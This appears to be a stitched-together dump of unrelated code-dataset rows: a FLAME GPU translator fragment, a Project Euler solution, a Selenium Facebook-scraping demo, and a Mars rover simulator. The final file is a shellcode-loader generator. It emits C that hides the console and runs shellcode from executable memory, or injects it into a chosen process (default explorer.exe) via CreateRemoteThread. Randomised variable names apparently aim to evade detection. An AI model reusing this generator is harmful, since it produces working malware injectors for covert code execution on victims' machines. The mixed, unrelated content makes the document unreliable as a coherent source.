    A very limited set of attributes are supported so these are fully evaluated here.
    Other places where attribute type expressions may occur will also evaluate them
    fully rather than recursively call this function.
    Attributes supported are only;
    * pyflamegpu.attribute - a supported attribute e.g. pyflamegpu.ALIVE. This will be translated into a namespace member.
    * math.constant - Any supported math constants are translated to C definition versions
    """
    # Only a limited set of globals supported (removed unused 'func_dict' local)
    if isinstance(t.value, ast.Name):
        # pyflamegpu singleton
        if t.value.id == "pyflamegpu":
            if t.attr in self.fgpu_attrs:
                # proceed: emit as a namespace member
                self.write("flamegpu::")
                self.write(t.attr)
            else:
                self.RaiseError(t, f"Attribute '{t.attr}' does not exist in pyflamegpu object")
        # math functions (try them in raw function call format) or constants
        elif t.value.id == "math":
            if t.attr in self.mathconsts:
                self.write(self.mathconsts[t.attr])
            else:
                self.RaiseError(t, f"Unsupported math constant '{t.attr}'")
        # numpy types
        elif t.value.id == "numpy" or t.value.id == "np":
            # not sure how a numpy attribute would be used without function call or type hint but translate anyway
            if t.attr in self.numpytypes:
                self.write(self.numpytypes[t.attr])
            else:
                self.RaiseError(t, f"Unsupported numpy type {t.attr}")
        else:
            self.RaiseError(t, f"Global '{t.value.id}' identifiers not supported")
    else:
        self.RaiseError(t, "Unsupported attribute")
def _CallArguments(self, t):
    """
    Emit a comma separated list of the call's positional arguments.
    Keyword arguments (and the pre-3.5 star/kw argument fields) are not
    supported and are discarded with a warning.
    """
    for index, argument in enumerate(t.args):
        if index:
            self.write(", ")
        self.dispatch(argument)
    if len(t.keywords):
        self.RaiseWarning(t, "Keyword argument not supported. Ignored.")
    if sys.version_info[:2] < (3, 5):
        if t.starargs:
            self.RaiseWarning(t, "Starargs not supported. Ignored.")
        if t.kwargs:
            self.RaiseWarning(t, "Kwargs not supported. Ignored.")
def _Call(self, t):
    """
    Some basic checks are undertaken on calls to ensure that the function being called is either a builtin or defined device function.
    A special dispatcher is required
    """
    # check calls but let attributes check in their own dispatcher
    funcs = self._device_functions + self.pythonbuiltins + [self._input_message_var]  # message_input variable is a valid function name as certain message types have arguments on iterator
    if isinstance(t.func, ast.Name):
        if (t.func.id not in funcs):
            self.RaiseWarning(t, "Function call is not a defined FLAME GPU device function or a supported python built in.")
        # dispatch even if warning raised
        self.dispatch(t.func)
    elif isinstance(t.func, ast.Lambda):
        # reaches the _Lambda handler, which raises
        self.dispatch(t.func)  # not supported
    else:
        # special handler for dispatching member function calls
        # This would otherwise be an attribute
        self.dispatchMemberFunction(t.func, t)
    self.write("(")
    self._CallArguments(t)
    self.write(")")
def _Subscript(self, t):
    """
    Arrays are not supported but subscript allows accessing array like variables which is required for macro environment properties (e.g. a[0][1][2])
    Obvious limitation is no slicing type syntax (e.g. a[:2])
    """
    self.dispatch(t.value)
    self.write("[")
    self.dispatch(t.slice)
    self.write("]")
def _Starred(self, t):
    self.RaiseError(t, "Starred values not supported")
# slice
def _Ellipsis(self, t):
    self.RaiseError(t, "Ellipsis values not supported")
def _Index(self, t):
    self.RaiseError(t, "Index values not supported")
def _Slice(self, t):
    self.RaiseError(t, "Slicing values not supported")
def _ExtSlice(self, t):
    self.RaiseError(t, "ExtSlice values not supported")
# argument
def _arg(self, t):
    """
    Arguments should be processed by a custom dispatcher and it should not be possible to get here
    """
    self.RaiseError(t, "Arguments should already have been processed")
# others
def _arguments(self, t):
    """
    Arguments should be processed by a custom dispatcher and it should not be possible to get here
    """
    self.RaiseError(t, "Arguments should already have been processed")
def _keyword(self, t):
    self.RaiseError(t, "Keywords are not supported")
def _Lambda(self, t):
    self.RaiseError(t, "Lambda is not supported")
def _alias(self, t):
    self.RaiseError(t, "Aliasing is not supported")
def _withitem(self, t):
    self.RaiseError(t, "With not supported")
|
2,996 | 7430e17d1c424362399cf09a0c3ecae825d04567 | import datetime
# Project Euler 19: count the Sundays that fell on the first of a month
# during the twentieth century (Jan 1901 - Dec 2000).
# NOTE: Python 2 code (xrange, print statement).
count = 0
for y in xrange(1901,2001):
    for m in xrange(1,13):
        # weekday() == 6 is Sunday
        if datetime.date(y,m,1).weekday() == 6:
            count += 1
print count
|
2,997 | 03b2b722832eb46f3f81618f70fd0475f1f08c94 |
# Demo: drive Chrome with Selenium and dump the rendered page HTML.
from selenium import webdriver
from time import sleep
from bs4 import BeautifulSoup
"""
With selenium we need web driver for our browser.
If you use google chrome, you can download chrome driver from here:
http://chromedriver.chromium.org/downloads
In linux (my OS) I extracted downloaded zip file and placed
exe file in "/home/UserName/bin"
I did this in order not to write chrome driver path everytime
"""
# IF you did not locate exe file in user/bin or user/local/bin
# then you have to specify the driver path while creating driver object
# driver object is browser which you can programatically control
# NOTE(review): the path below is macOS-style while the note above describes
# a Linux setup -- confirm which environment this targets
driver = webdriver.Chrome('/Users/UserName/Downloads/chromedriver')
# open some page using get method
driver.get('https://www.facebook.com')
# driver.page_source
# Opens facebook's source html file
# parse the JS-rendered source with BeautifulSoup's lxml parser
soup = BeautifulSoup(driver.page_source,'lxml')
print(soup.prettify())
# close webdriver object
driver.close()
|
class Rover(object):
    """A rover on a rectangular plateau.

    Tracks an (x, y) position plus a compass orientation, executes 'L'/'R'/'M'
    command strings, and refuses any move that would leave the plateau or run
    into another rover.
    """

    # compass points in clockwise order, so a rotation is index arithmetic
    DIRECTIONS = 'NESW'
    # (dx, dy) applied by a single 'M' command for each orientation
    MOVEMENTS = {
        'N': (0, 1),
        'E': (1, 0),
        'S': (0, -1),
        'W': (-1, 0)
    }

    def __init__(self, init_string, plateau_dimensions):
        """
        init_string: "x y o" string, e.g. "1 2 N"
        plateau_dimensions: (max_x, max_y) pair giving the plateau's
        upper-right corner (the rover gets a sense of the plateau it's on)
        """
        max_x, max_y = plateau_dimensions
        self.max_x = int(max_x)
        self.max_y = int(max_y)
        # x/y = current coordinates, o = current orientation.
        # Clamp the start position onto the plateau; the original only clamped
        # the upper bound, so a negative coordinate could escape the grid.
        x, y, o = init_string.split(' ')
        self.x = min(self.max_x, max(0, int(x)))
        self.y = min(self.max_y, max(0, int(y)))
        self.o = o
        # nested dict {x: {y: marker}} of cells occupied by other rovers
        self.obstacles = {}
        self.commands = ''

    def __repr__(self):
        return "<Rover x=%d, y=%d, o=%s>" % (self.x, self.y, self.o)

    def get_position(self):
        return self.x, self.y

    def set_obstacles(self, locations):
        """Record (x, y) cells that this rover must not enter."""
        for x, y in locations:
            d = self.obstacles.setdefault(x, {})
            d.setdefault(y, 'ROVER')  # could be any value

    def is_location_free(self, x, y):
        """Return True if no obstacle has been recorded at (x, y)."""
        return self.obstacles.get(x, {}).get(y) is None

    def rotate_right(self):
        self._rotate(1)

    def rotate_left(self):
        self._rotate(-1)

    def _rotate(self, direction):
        # direction is +1 (clockwise) or -1 (anticlockwise); wrap around
        i = self.DIRECTIONS.index(self.o) + direction
        self.o = self.DIRECTIONS[i % len(self.DIRECTIONS)]

    def move(self):
        """Advance one cell in the current orientation, unless blocked."""
        dx, dy = self.MOVEMENTS.get(self.o)
        new_x = self.x + dx
        new_y = self.y + dy
        if (not 0 <= new_x <= self.max_x) or (not 0 <= new_y <= self.max_y):
            # ignore, out of bounds
            pass
        elif not self.is_location_free(new_x, new_y):
            # there is a rover in my way!
            pass
        else:
            self.x = new_x
            self.y = new_y

    def set_commands(self, command_string):
        self.commands = command_string

    def execute(self):
        """Run the stored command string and return the final 'x y o' state."""
        for c in self.commands:
            if c == 'L':
                self.rotate_left()
            elif c == 'R':
                self.rotate_right()
            elif c == 'M':
                self.move()
            else:
                # parenthesised form works identically on Python 2 and 3
                # (the original py2 print statement broke py3)
                print('unknown command: %s' % c)
        return "%d %d %s" % (self.x, self.y, self.o)
class ControlCenter(object):
    """Parses a mission input string and drives a fleet of rovers in order."""

    def __init__(self):
        self.input = ''
        self.rovers = []

    def set_input(self, text):
        """Split the raw input on newlines, discarding empty lines."""
        self.input = [ln for ln in text.split('\n') if ln]

    def clear_rovers(self):
        self.rovers = []

    def initialize_rover(self, initial_position, plateau_dimensions):
        """Create a rover, keep it for collision bookkeeping, and return it."""
        rover = Rover(initial_position, plateau_dimensions)
        self.rovers.append(rover)
        return rover

    def run(self):
        """Build every rover from the parsed input, then execute each in turn.

        Line 0 is the plateau size; after that, lines alternate between a
        rover's starting position and its command string.
        """
        dims = None
        rover = None
        for i, line in enumerate(self.input):
            line = line.upper()
            if i == 0:
                dims = line.split(" ")
            elif i % 2 == 1:
                rover = self.initialize_rover(line, dims)
            else:
                rover.set_commands(line)
        # Every rover now exists, so each mover can be told where all the
        # others currently stand to avoid collisions.
        final_states = []
        for i, rover in enumerate(self.rovers):
            others = self.rovers[:i] + self.rovers[i + 1:]
            rover.set_obstacles([r.get_position() for r in others])
            final_states.append(rover.execute())
        return "\n\n".join(final_states)
if __name__ == "__main__":
    # Smoke-test harness: each entry in ``tests`` pairs a mission input string
    # with the expected final rover states.
    from test_cases import tests
    success = 0
    i = 0  # guard against an empty test list leaving 'i' undefined
    cc = ControlCenter()
    for i, (test_input, test_output) in enumerate(tests, start=1):
        cc.clear_rovers()
        cc.set_input(test_input)
        if cc.run() == test_output:
            success += 1
    # parenthesised print works identically on Python 2 and 3
    print('%d tests out of %d passed' % (success, i))
|
from lib import gen, core

# Randomised C identifiers shared by every generation helper below: the name
# of the payload byte array and of the console window handle.
Shellcode = gen.Varname_Creator()
Hide_Window = gen.Varname_Creator()
def Start():
    """Return the opening of the generated C program.

    Emits the standard Windows headers, the start of main(), and the opening
    of the shellcode byte-array declaration (left unterminated so the caller
    can append the payload bytes).
    """
    headers = ("windows.h", "tlhelp32.h", "stdio.h", "stdlib.h", "string.h")
    code = "".join("#include <%s>\n" % header for header in headers)
    code += "int main(int argc, char **argv) {"
    code += "char " + Shellcode + "[] = {"
    return code
def Hide_Window_Console():
    """Return C code that closes the shellcode array and hides the console.

    The leading "};" terminates the byte array opened by Start().
    """
    parts = [
        "};\nHWND " + Hide_Window + " = GetConsoleWindow();",
        "ShowWindow(" + Hide_Window + ", SW_HIDE);",
    ]
    return "".join(parts)
def Local_Or_Remote():
    """Ask the user which injection technique to generate code for.

    Option 1 (and any unrecognised input) produces a local thread injection
    stub; option 2 asks for a target process name (defaulting to
    explorer.exe) and produces a remote thread injection stub.
    The original duplicated the local branch and the default-name branch;
    both are collapsed here with identical behaviour.
    """
    print("""
    |---------------------------------------|
    | [1] Local Thread Injection (DEFAULT); |
    | [2] Remote Thread Injection; |
    |---------------------------------------|
    """)
    Choice = core.core_input()
    if Choice == "2":
        print("""
    |-----------------------------------------------------|
    | Which process to inject ? (DEFAULT = explorer.exe); |
    |-----------------------------------------------------|
    """)
        # empty input falls back to the default target process
        ProcessName = core.core_input() or "explorer.exe"
        return End_Remote_Thread_Injection(ProcessName)
    # "1", empty input, or anything else defaults to local injection
    return End_Local_Thread_Injection()
def End_Local_Thread_Injection():
    """Return C code that runs the shellcode in the current process.

    Allocates RWX memory with VirtualAlloc, copies the payload in, and jumps
    to it via a function-pointer cast. The trailing '}' closes main().
    """
    exec_buf = gen.Varname_Creator()
    code = "void *" + exec_buf + " = VirtualAlloc(0, sizeof " + Shellcode + ", MEM_COMMIT, PAGE_EXECUTE_READWRITE);"
    code += "memcpy(" + exec_buf + ", " + Shellcode + ", sizeof " + Shellcode + ");"
    code += "((void(*)())" + exec_buf + ")();}"
    return code
def End_Remote_Thread_Injection(ProcessName):
    """Return C code that injects the shellcode into a remote process.

    Walks the process list via the ToolHelp32 snapshot API looking for
    ProcessName, allocates RWX memory in every match, copies the shellcode in
    with WriteProcessMemory and starts it with CreateRemoteThread.
    NOTE(review): this generates process-injection tooling -- handle with the
    appropriate security review.
    """
    # fresh randomised identifiers for each generated C variable
    Entry = gen.Varname_Creator()
    Snapshot = gen.Varname_Creator()
    Process_Handle = gen.Varname_Creator()
    Remote_Thread = gen.Varname_Creator()
    Remote_Buffer = gen.Varname_Creator()
    Remote_Thread_Injection = "PROCESSENTRY32 " + Entry + ";"
    Remote_Thread_Injection += Entry + ".dwSize = sizeof(PROCESSENTRY32);"
    Remote_Thread_Injection += "HANDLE " + Snapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);"
    Remote_Thread_Injection += "if (Process32First(" + Snapshot + ", &" + Entry + ") == TRUE){"
    Remote_Thread_Injection += "while (Process32Next(" + Snapshot + ", &" + Entry + ") == TRUE){"
    # case-insensitive match of the executable name against the target
    Remote_Thread_Injection += 'if (stricmp(' + Entry + '.szExeFile, ' + '"' + ProcessName + '"' + ') == 0){'
    Remote_Thread_Injection += "HANDLE " + Process_Handle + ";"
    Remote_Thread_Injection += "HANDLE " + Remote_Thread + ";"
    Remote_Thread_Injection += "PVOID " + Remote_Buffer + ";"
    Remote_Thread_Injection += Process_Handle + " = OpenProcess(PROCESS_ALL_ACCESS, FALSE, " + Entry + ".th32ProcessID);"
    Remote_Thread_Injection += Remote_Buffer + " = VirtualAllocEx(" + Process_Handle + ", NULL, sizeof " + Shellcode + ", (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);"
    Remote_Thread_Injection += "WriteProcessMemory(" + Process_Handle + ", " + Remote_Buffer + ", " + Shellcode + ", sizeof " + Shellcode + ", NULL);"
    Remote_Thread_Injection += Remote_Thread + " = CreateRemoteThread(" + Process_Handle + ", NULL, 0, (LPTHREAD_START_ROUTINE)" + Remote_Buffer + ", NULL, 0, NULL);"
    Remote_Thread_Injection += "CloseHandle(" + Process_Handle + ");}}}"
    # final '}' closes main() opened by Start()
    Remote_Thread_Injection += "CloseHandle(" + Snapshot + ");}"
    return Remote_Thread_Injection
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.